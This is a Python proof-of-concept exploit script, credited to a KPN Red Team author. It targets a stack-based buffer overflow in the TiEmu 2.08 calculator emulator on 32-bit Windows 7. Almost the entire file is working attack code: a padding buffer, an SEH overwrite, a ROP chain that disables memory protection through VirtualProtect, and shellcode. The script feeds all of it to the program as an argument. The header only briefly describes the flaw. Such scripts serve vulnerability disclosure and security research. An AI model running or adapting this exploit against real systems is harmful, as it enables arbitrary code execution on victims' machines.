#!/usr/bin/python
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Tested on: Windows 7 32 bits
#
# Description: TiEmu ( Texas Instrument Emulator ) 2.08 and prior is
# prone to a stack-based buffer overflow vulnerability because the
application fails to perform adequate
# boundary-checks on user-supplied input.
#
# What is TiEmu?
# TiEmu is a multi-platform emulator for TI89 / TI89 Titanium / TI92 / TI92+ / V200PLT hand-helds.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://lpg.ticalc.org/prj_tiemu/

import struct, subprocess, os
file = "C:/Program Files/TiEmu/bin/tiemu.exe"
junk =  "A" * 452
nseh = struct.pack('L', 0x06eb9090)
seh = struct.pack('L', 0x6c3010ba) # pop ebx # pop ebp # ret  -
libtifiles2-5.dll

def create_rop_chain():
  rop_gadgets = [
    0x75ecd264,  # POP ECX # RETN [SHELL32.DLL]
    0x711e1388,  # ptr to &VirtualProtect() [IAT COMCTL32.DLL]
    0x7549fd52,  # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll]
    0x628daecc,  # POP EBP # RETN [tcl84.dll]
    0x76c319b8,  # & push esp # ret  [kernel32.dll]
    0x7606c311,  # POP EAX # RETN [SHELL32.DLL]
    0xfffffdff,  # Value to negate, will become 0x00000201
    0x75de6a90,  # NEG EAX # RETN [SHLWAPI.dll]
    0x76c389d9,  # XCHG EAX,EBX # RETN [kernel32.dll]
    0x754f3b2f,  # POP EAX # RETN [MSCTF.dll]
    0xffffffc0,  # Value to negate, will become 0x00000040
    0x76b13193,  # NEG EAX # RETN [USER32.dll]
    0x76c38a09,  # XCHG EAX,EDX # RETN [kernel32.dll]
    0x757dfbf7,  # POP ECX # RETN [ole32.dll]
    0x71256c9b,  # &Writable location [COMCTL32.DLL]
    0x77048567,  # POP EDI # RETN [RPCRT4.dll]
    0x757e65e2,  # RETN (ROP NOP) [ole32.dll]
    0x76cd6ee4,  # POP EAX # RETN [kernel32.dll]
    0x90909090,  # nop
    0x76ac6d21,  # PUSHAD # RETN [OLEAUT32.dll]
  ]
  return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

shellcode = "\x90"*6
shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"

junk2 =  "A" * 2000

buffer = junk  + nseh + seh + rop_chain + shellcode + junk2

try:
   print(buffer)
   subprocess.call([file, buffer])
except OSError as e:
   if e.errno == os.errno.ENOENT:
       print "TiEmu not found!"
   else:
print "Error executing exploit"
   raise